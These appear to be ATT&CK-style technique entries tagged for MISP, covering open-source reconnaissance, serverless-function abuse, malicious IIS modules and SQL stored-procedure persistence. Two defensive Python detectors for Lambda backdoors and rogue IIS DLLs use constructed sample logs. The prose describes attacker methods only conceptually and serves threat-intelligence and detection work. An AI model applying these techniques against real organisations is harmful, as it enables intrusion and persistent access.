Adversaries may search CDN data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about content servers within a CDN. Adversaries may also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the organization’s website.<sup>[[DigitalShadows CDN](https://app.tidalcyber.com/references/183a070f-6c8c-46e3-915b-6edc58bb5e91)]</sup> Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381)).

The tag is: misp-galaxy:technique="CDNs"

Digital Certificates

Adversaries may search public digital certificate data for information about victims that can be used during targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS communications), contain information about the registered organization such as name and location.

Adversaries may search digital certificate data to gather actionable information. Threat actors can use online resources and lookup tools to harvest information about certificates.<sup>[[SSLShopper Lookup](https://app.tidalcyber.com/references/a8dc493f-2021-48fa-8f28-afd13756b789)]</sup> Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used from encrypted web traffic are served with content).<sup>[[Medium SSL Cert](https://app.tidalcyber.com/references/6502425f-3435-4162-8c96-9e10a789d362)]</sup> Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).

The tag is: misp-galaxy:technique="Digital Certificates"

DNS/Passive DNS

Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.

Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS).<sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup> Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).

The tag is: misp-galaxy:technique="DNS/Passive DNS"

Scan Databases

Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.<sup>[[Shodan](https://app.tidalcyber.com/references/a142aceb-3ef5-4231-8771-bb3b2dae9acd)]</sup>

Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).

The tag is: misp-galaxy:technique="Scan Databases"

WHOIS

Adversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.<sup>[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup>

Adversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).

The tag is: misp-galaxy:technique="WHOIS"

Search Open Technical Databases

Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.<sup>[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup><sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup><sup>[[Medium SSL Cert](https://app.tidalcyber.com/references/6502425f-3435-4162-8c96-9e10a789d362)]</sup><sup>[[SSLShopper Lookup](https://app.tidalcyber.com/references/a8dc493f-2021-48fa-8f28-afd13756b789)]</sup><sup>[[DigitalShadows CDN](https://app.tidalcyber.com/references/183a070f-6c8c-46e3-915b-6edc58bb5e91)]</sup><sup>[[Shodan](https://app.tidalcyber.com/references/a142aceb-3ef5-4231-8771-bb3b2dae9acd)]</sup>

Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf)).

The tag is: misp-galaxy:technique="Search Open Technical Databases"

Code Repositories

Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.

Adversaries may search various public code repositories for various information about a victim. Public code repositories can often be a source of various general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys.<sup>[[GitHub Cloud Service Credentials](https://app.tidalcyber.com/references/d2186b8c-10c9-493b-8e25-7d69fce006e4)]</sup> Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).

Note: This is distinct from [Code Repositories](https://app.tidalcyber.com/technique/fe595943-f264-4d05-a8c7-7afc8985bfc3), which focuses on [Collection](https://app.tidalcyber.com/tactics/1ca65327-b553-4923-ae19-8e6987ca250a) from private and internally hosted code repositories.

The tag is: misp-galaxy:technique="Code Repositories"

Search Engines

Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typically crawl online sites to index content and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).<sup>[[SecurityTrails Google Hacking](https://app.tidalcyber.com/references/3e7fdeaf-24a7-4cb5-8ed3-6057c9035303)]</sup><sup>[[ExploitDB GoogleHacking](https://app.tidalcyber.com/references/29714b88-a1ff-4684-a3b0-35c3a2c78947)]</sup>

Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).

The tag is: misp-galaxy:technique="Search Engines"

Social Media

Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.

Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victims into revealing specific information (i.e. Spearphishing Service).<sup>[[Cyware Social Media](https://app.tidalcyber.com/references/e6136a63-81fe-4363-8d98-f7d1e85a0f2b)]</sup> Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Spearphishing via Service](https://app.tidalcyber.com/technique/165ba336-3eab-4809-b6fd-d0dcc5478f7f)).

The tag is: misp-galaxy:technique="Social Media"

Search Open Websites/Domains

Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, news sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.<sup>[[Cyware Social Media](https://app.tidalcyber.com/references/e6136a63-81fe-4363-8d98-f7d1e85a0f2b)]</sup><sup>[[SecurityTrails Google Hacking](https://app.tidalcyber.com/references/3e7fdeaf-24a7-4cb5-8ed3-6057c9035303)]</sup><sup>[[ExploitDB GoogleHacking](https://app.tidalcyber.com/references/29714b88-a1ff-4684-a3b0-35c3a2c78947)]</sup>

Adversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).

The tag is: misp-galaxy:technique="Search Open Websites/Domains"

Search Victim-Owned Websites

Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://app.tidalcyber.com/technique/2eee984c-ea00-4284-b3eb-fd0c603a5a80)). These sites may also have details highlighting business operations and relationships.<sup>[[Comparitech Leak](https://app.tidalcyber.com/references/fa0eac56-45ea-4628-88cf-b843874b4a4d)]</sup>

Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Establish Accounts](https://app.tidalcyber.com/technique/9a2d6628-0dd7-4f25-a242-b752fcf47ff4) or [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf) or [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533)).

The tag is: misp-galaxy:technique="Search Victim-Owned Websites"

Serverless Execution

Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers.

Adversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. Resource Hijacking).<sup>[[Cado Security Denonia](https://app.tidalcyber.com/references/584e7ace-ef33-423b-9801-4728a447cb34)]</sup> Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the IAM:PassRole permission in AWS or the iam.serviceAccounts.actAs permission in Google Cloud to add [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1) to a serverless cloud function, which may then be able to perform actions the original user cannot.<sup>[[Rhino Security Labs AWS Privilege Escalation](https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)]</sup><sup>[[Rhingo Security Labs GCP Privilege Escalation](https://app.tidalcyber.com/references/55373476-1cbe-49f5-aecb-69d60b336d38)]</sup>

Serverless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://app.tidalcyber.com/technique/e1e42979-d3cd-461b-afc4-a6373cbf97ba)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://app.tidalcyber.com/technique/0799f2ee-3a83-452e-9fa9-83e91d83be25) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.<sup>[[Backdooring an AWS account](https://app.tidalcyber.com/references/2c867527-1584-44f7-b5e5-8ca54ea79619)]</sup> Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.<sup>[[Varonis Power Automate Data Exfiltration](https://app.tidalcyber.com/references/16436468-1daf-433d-bb3b-f842119594b4)]</sup><sup>[[Microsoft DART Case Report 001](https://app.tidalcyber.com/references/bd8c6a86-1a63-49cd-a97f-3d119e4223d4)]</sup>
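The CreateUser-triggered Lambda backdoor described above leaves a recognisable trail in CloudTrail: a `PutRule` whose event pattern is scoped to IAM API calls, a `PutTargets` pointing that rule at a Lambda function, and usually a `CreateFunction` that passed an execution role. The following detection is an added example written for this page (not MISP, Tidal or ATT&CK code); the CloudTrail records, account id, ARNs and role names are constructed placeholders, and the list of IAM trigger events is an assumed starting point a defender would tune.

```python
import json
from collections import defaultdict
from typing import Dict, List, Optional, Set

# IAM API calls that, used as a rule trigger, suggest a function reacting to
# identity changes (assumed watch list; tune for your environment).
IAM_TRIGGER_EVENTS = {"CreateUser", "CreateAccessKey", "CreateLoginProfile",
                      "AttachUserPolicy", "PutUserPolicy", "AddUserToGroup"}

# Constructed CloudTrail records (not real logs). Account id 111122223333 and all
# ARNs are placeholders; only the fields the detection reads are included.
ACCOUNT = "111122223333"
SAMPLE_TRAIL = [
    {"eventTime": "2024-05-01T10:00:00Z", "eventSource": "lambda.amazonaws.com",
     "eventName": "CreateFunction20150331",
     "userIdentity": {"arn": f"arn:aws:iam::{ACCOUNT}:user/dev-user"},
     "requestParameters": {"functionName": "user-sync-helper",
                           "role": f"arn:aws:iam::{ACCOUNT}:role/IamAdminRole"},
     "responseElements": {"functionArn": f"arn:aws:lambda:us-east-1:{ACCOUNT}:function:user-sync-helper"}},
    {"eventTime": "2024-05-01T10:01:00Z", "eventSource": "events.amazonaws.com",
     "eventName": "PutRule",
     "userIdentity": {"arn": f"arn:aws:iam::{ACCOUNT}:user/dev-user"},
     "requestParameters": {"name": "on-new-user", "eventPattern": json.dumps({
         "source": ["aws.iam"], "detail-type": ["AWS API Call via CloudTrail"],
         "detail": {"eventSource": ["iam.amazonaws.com"], "eventName": ["CreateUser"]}})}},
    {"eventTime": "2024-05-01T10:02:00Z", "eventSource": "events.amazonaws.com",
     "eventName": "PutTargets",
     "userIdentity": {"arn": f"arn:aws:iam::{ACCOUNT}:user/dev-user"},
     "requestParameters": {"rule": "on-new-user", "targets": [
         {"id": "1", "arn": f"arn:aws:lambda:us-east-1:{ACCOUNT}:function:user-sync-helper"}]}},
    # Benign control: a nightly cleanup job fired by a schedule, not by an IAM event.
    {"eventTime": "2024-05-01T11:00:00Z", "eventSource": "lambda.amazonaws.com",
     "eventName": "CreateFunction20150331",
     "userIdentity": {"arn": f"arn:aws:iam::{ACCOUNT}:role/DeployRole"},
     "requestParameters": {"functionName": "nightly-cleanup",
                           "role": f"arn:aws:iam::{ACCOUNT}:role/CleanupExecRole"},
     "responseElements": {"functionArn": f"arn:aws:lambda:us-east-1:{ACCOUNT}:function:nightly-cleanup"}},
    {"eventTime": "2024-05-01T11:01:00Z", "eventSource": "events.amazonaws.com",
     "eventName": "PutRule",
     "userIdentity": {"arn": f"arn:aws:iam::{ACCOUNT}:role/DeployRole"},
     "requestParameters": {"name": "nightly", "scheduleExpression": "cron(0 2 * * ? *)"}},
    {"eventTime": "2024-05-01T11:02:00Z", "eventSource": "events.amazonaws.com",
     "eventName": "PutTargets",
     "userIdentity": {"arn": f"arn:aws:iam::{ACCOUNT}:role/DeployRole"},
     "requestParameters": {"rule": "nightly", "targets": [
         {"id": "1", "arn": f"arn:aws:lambda:us-east-1:{ACCOUNT}:function:nightly-cleanup"}]}},
]


def iam_events_in_pattern(pattern_json: Optional[str]) -> Set[str]:
    """IAM API names an EventBridge/CloudWatch Events pattern fires on.
    '*' means the pattern is IAM-scoped but does not constrain eventName."""
    if not pattern_json:
        return set()
    try:
        pattern = json.loads(pattern_json)
    except ValueError:
        return set()
    detail = pattern.get("detail") or {}
    iam_scoped = ("aws.iam" in pattern.get("source", [])
                  or "iam.amazonaws.com" in detail.get("eventSource", []))
    if not iam_scoped:
        return set()
    names = set(detail.get("eventName", []))
    return (names & IAM_TRIGGER_EVENTS) if names else {"*"}


def find_iam_triggered_functions(trail: List[dict]) -> List[dict]:
    """Correlate PutRule (IAM-scoped pattern) -> PutTargets (Lambda ARN), then
    enrich with the CreateFunction event and the execution role it passed."""
    created: Dict[str, dict] = {}
    rules: Dict[str, dict] = {}
    targets: Dict[str, List[str]] = defaultdict(list)
    for ev in trail:
        src, name = ev.get("eventSource"), ev.get("eventName", "")
        params = ev.get("requestParameters") or {}
        if src == "lambda.amazonaws.com" and name.startswith("CreateFunction"):
            arn = (ev.get("responseElements") or {}).get("functionArn")
            if arn:
                created[arn] = ev
        elif src == "events.amazonaws.com" and name == "PutRule":
            rules[params.get("name")] = ev
        elif src == "events.amazonaws.com" and name == "PutTargets":
            targets[params.get("rule")].extend(t.get("arn", "") for t in params.get("targets", []))
    alerts = []
    for rule_name, rule_ev in rules.items():
        triggers = iam_events_in_pattern((rule_ev.get("requestParameters") or {}).get("eventPattern"))
        if not triggers:
            continue
        for arn in targets.get(rule_name, []):
            if ":function:" not in arn:
                continue                      # rule targets something other than Lambda
            fn_ev = created.get(arn)          # None if the function predates the log window
            alerts.append({
                "rule": rule_name,
                "triggers": sorted(triggers),
                "function": arn.rsplit(":", 1)[-1],
                "created_by": (fn_ev or rule_ev).get("userIdentity", {}).get("arn"),
                "role_passed": ((fn_ev or {}).get("requestParameters") or {}).get("role"),
            })
    return alerts
```

A function that predates the log window still produces an alert (with `role_passed` empty), so the rule-to-target correlation alone is enough to surface the trigger.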

The tag is: misp-galaxy:technique="Serverless Execution"

IIS Components

Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.<sup>[[Microsoft ISAPI Extension Overview 2017](https://app.tidalcyber.com/references/d00a692f-b990-4757-8acd-56818462ac0c)]</sup><sup>[[Microsoft ISAPI Filter Overview 2017](https://app.tidalcyber.com/references/2fdbf1ba-0480-4d70-9981-3b5967656472)]</sup><sup>[[IIS Backdoor 2011](https://app.tidalcyber.com/references/fd450382-cca0-40c4-8144-cc90a3b0011b)]</sup><sup>[[Trustwave IIS Module 2013](https://app.tidalcyber.com/references/cbb79c3c-1e2c-42ac-8183-9566ccde0cd6)]</sup>

Adversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously compromised hosts.<sup>[[Microsoft ISAPI Filter Overview 2017](https://app.tidalcyber.com/references/2fdbf1ba-0480-4d70-9981-3b5967656472)]</sup><sup>[[Microsoft ISAPI Extension Overview 2017](https://app.tidalcyber.com/references/d00a692f-b990-4757-8acd-56818462ac0c)]</sup><sup>[[Microsoft ISAPI Extension All Incoming 2017](https://app.tidalcyber.com/references/7d182eee-eaa8-4b6f-803d-8eb64e338663)]</sup><sup>[[Dell TG-3390](https://app.tidalcyber.com/references/dfd2d832-a6c5-40e7-a554-5a92f05bebae)]</sup><sup>[[Trustwave IIS Module 2013](https://app.tidalcyber.com/references/cbb79c3c-1e2c-42ac-8183-9566ccde0cd6)]</sup><sup>[[MMPC ISAPI Filter 2012](https://app.tidalcyber.com/references/ef412bcd-54be-4972-888c-f5a2cdfb8d02)]</sup>

Adversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports <code>RegisterModule</code>, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.<sup>[[Microsoft IIS Modules Overview 2007](https://app.tidalcyber.com/references/c8db6bfd-3a08-43b3-b33b-91a32e9bd694)]</sup><sup>[[Trustwave IIS Module 2013](https://app.tidalcyber.com/references/cbb79c3c-1e2c-42ac-8183-9566ccde0cd6)]</sup><sup>[[ESET IIS Malware 2021](https://app.tidalcyber.com/references/d9c6e55b-39b7-4097-8ab2-8b87421ce2f4)]</sup>
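Native IIS modules and ISAPI filters are registered in applicationHost.config (`<globalModules>` and `<isapiFilters>`), so a defender can audit that file for DLLs loaded from outside the stock IIS and .NET directories or for component names missing from a known-good baseline. The audit below is an added example written for this page (not MISP, Tidal or ATT&CK code); the config fragment is constructed, and the trusted-directory list is an assumption to adjust for non-default installs.

```python
import xml.etree.ElementTree as ET
from typing import List, NamedTuple, Optional, Set

# Locations from which stock IIS and .NET native components are normally loaded
# (assumed defaults). Comparison is case-insensitive; the unexpanded %windir%
# token is accepted because applicationHost.config stores paths that way.
TRUSTED_PREFIXES = (
    "%windir%\\system32\\inetsrv\\",
    "c:\\windows\\system32\\inetsrv\\",
    "%windir%\\microsoft.net\\",
    "c:\\windows\\microsoft.net\\",
)

# Constructed applicationHost.config fragment (not taken from a real server).
# Two entries load DLLs from writable, non-standard locations.
SAMPLE_APPHOST_CONFIG = r"""<configuration>
  <system.webServer>
    <globalModules>
      <add name="HttpLoggingModule" image="%windir%\System32\inetsrv\loghttp.dll" />
      <add name="StaticFileModule" image="%windir%\System32\inetsrv\static.dll" />
      <add name="CachingHelper" image="C:\inetpub\temp\cachehelper.dll" />
    </globalModules>
    <isapiFilters>
      <filter name="ASP.Net_4.0_32bit" path="%windir%\Microsoft.NET\Framework\v4.0.30319\aspnet_filter.dll" enabled="true" />
      <filter name="Compression" path="C:\Windows\Temp\compress.dll" enabled="true" />
    </isapiFilters>
  </system.webServer>
</configuration>
"""


class Finding(NamedTuple):
    kind: str    # "globalModule" or "isapiFilter"
    name: str
    path: str
    reason: str


def _normalize(path: str) -> str:
    return path.strip().lower().replace("/", "\\")


def audit_applicationhost(xml_text: str, baseline: Optional[Set[str]] = None) -> List[Finding]:
    """Flag native modules and ISAPI filters whose binary lives outside the trusted
    IIS/.NET directories, and (when a baseline of expected component names is
    supplied) any component the baseline does not list."""
    root = ET.fromstring(xml_text)
    entries = []
    for web_server in root.iter("system.webServer"):
        for add in web_server.findall("./globalModules/add"):
            entries.append(("globalModule", add.get("name", ""), add.get("image", "")))
        for flt in web_server.findall("./isapiFilters/filter"):
            entries.append(("isapiFilter", flt.get("name", ""), flt.get("path", "")))

    findings: List[Finding] = []
    for kind, name, path in entries:
        if not _normalize(path).startswith(TRUSTED_PREFIXES):
            findings.append(Finding(kind, name, path, "binary outside trusted IIS/.NET directories"))
        elif baseline is not None and name not in baseline:
            findings.append(Finding(kind, name, path, "component name not in baseline"))
    return findings


if __name__ == "__main__":
    for f in audit_applicationhost(SAMPLE_APPHOST_CONFIG):
        print(f"[{f.kind}] {f.name}: {f.path} ({f.reason})")
```

Managed (.NET) modules registered under `<modules>` by type name are not covered here and need a separate comparison against the site's expected assemblies.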

The tag is: misp-galaxy:technique="IIS Components"

SQL Stored Procedures

Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted).

Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.<sup>[[NetSPI Startup Stored Procedures](https://app.tidalcyber.com/references/afe89472-ac42-4a0d-b398-5ed6a5dee74f)]</sup><sup>[[Kaspersky MSSQL Aug 2019](https://app.tidalcyber.com/references/569a6be3-7a10-4aa4-be26-a62ed562a4ce)]</sup> To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.<sup>[[NetSPI Startup Stored Procedures](https://app.tidalcyber.com/references/afe89472-ac42-4a0d-b398-5ed6a5dee74f)]</sup><sup>[[Kaspersky MSSQL Aug 2019](https://app.tidalcyber.com/references/569a6be3-7a10-4aa4-be26-a62ed562a4ce)]</sup><sup>[[Microsoft xp_cmdshell 2017](https://app.tidalcyber.com/references/1945b8b2-de29-4f7a-8957-cc96fbad3b11)]</sup>

Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).<sup>[[Microsoft CLR Integration 2017](https://app.tidalcyber.com/references/83fc7522-5eb1-4710-8391-090389948686)]</sup> Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.<sup>[[NetSPI SQL Server CLR](https://app.tidalcyber.com/references/6f3d8c89-9d5d-4754-98d5-44fe3a5dd0d5)]</sup>

